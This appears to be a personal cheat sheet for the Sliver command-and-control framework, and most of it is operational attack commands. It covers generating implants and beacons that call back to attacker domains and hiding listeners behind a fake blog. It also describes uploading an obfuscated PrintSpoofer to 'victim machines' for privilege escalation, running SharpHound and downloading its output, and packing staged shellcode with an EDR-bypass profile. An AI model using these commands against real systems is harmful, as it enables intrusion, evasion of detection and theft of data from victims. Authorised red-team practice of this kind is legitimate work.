# Sliver

Sliver's a rad C2 (command-and-control) framework

# Resources that help me make sense of Sliver

# Install Sliver

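# Linux one-liner (this pipes a remote script straight into a root shell; download and read the script first if you don't fully trust the source or the network path)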

curl https://sliver.sh/install|sudo bash

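# With a single binary (if the release publishes a signature or checksum, verify the download against it before running)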

cd ~/
wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux
chmod +x sliver-server_linux

# Install certbot (optional - only needed if you want a Let's Encrypt certificate)

sudo apt install certbot -y
sudo certbot certonly

# I like this method because I port-forward 80/443 to my internal host, then choose option 1 (temporary Web server) and then fill out the rest of the fields to generate my cert
#
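# Copy the cert and key files to the home folder to make them easier to access later (privkey.pem is the TLS private key, so this leaves a second copy outside /etc/letsencrypt that needs the same protection):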
#
# sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/
# sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/
#
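# Adjust ownership and permissions so your unprivileged user ("kali" or whatever) can read these files (replace sevminsec with your own username; the chmod uses relative paths, so run it from the home folder):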
# sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem
# sudo chmod 640 privkey.pem fullchain.pem 

# Run Sliver

sudo ./sliver-server_linux

# Install the armory

(At a sliver shell)

armory install all

# IMPLANTS

# Generate a general implant

generate --http https://10.7.10.253:8090 --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name ETPHONEHOME

# Generate an implant with a custom domain

generate --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name ETPHONEHOME

# Delete an implant

implants rm NAME-OF-IMPLANT

# Start a general listener

https --lhost 10.7.10.253 --lport 8090

# Start a listener with a custom domain

https --domain example.com

# Generate a fake Web site to go along with your HTTPS listener

websites add-content --website fake-blog --web-path / --content www/index.html

Note: the fake-blog name is referenced below if you set up an HTTPS listener with a custom domain and specific fake content.

# Starting an HTTPS listener with a custom domain WITH a pre-generated LetsEncrypt cert AND static content on your fake site

https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

# Establishing sessions with victim machines

From the victim system, find a way to run your beacon.exe. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated printspoofer.exe:

use xxx (the session that was spawned)
upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe

Then run it:

execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe

# Interacting with sessions

# Run BloodHound

sharp-hound-4 -- 'c all' --outputdirectory 'c:\users\public'

Find and download it:

ls *.zip
download 2025blahblah.zip

# Kill all dead sessions (marked as [DEAD])

sessions -C

# BEACONS

# Generate one with custom domain

generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE

# Check beacon status

beacons

# Watch beacons continuously for check in

beacons watch

# Adjust check-in time of the beacon

use xxx

# Reconfigure callback time to 200s with an 11s jitter
reconfigure -i 200s -j 11s

# Check pending tasks

tasks

# PROFILES

Under construction

# Create a profile (named "bee" here)

profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee

# Add fake blog

websites add-content --website fake-blog --web-path / --content www/index.html

# Stand up domain with HTTPS

https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

# Stage a listener

stage-listener --url https://yourdomain.com:8080 --profile bee

# Generate an implant from the profile

profiles generate bee

# Setup a staged payload with shellcodepack

echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json

# Start Sliver as a service (use restart in place of start to restart it)

sudo systemctl start sliver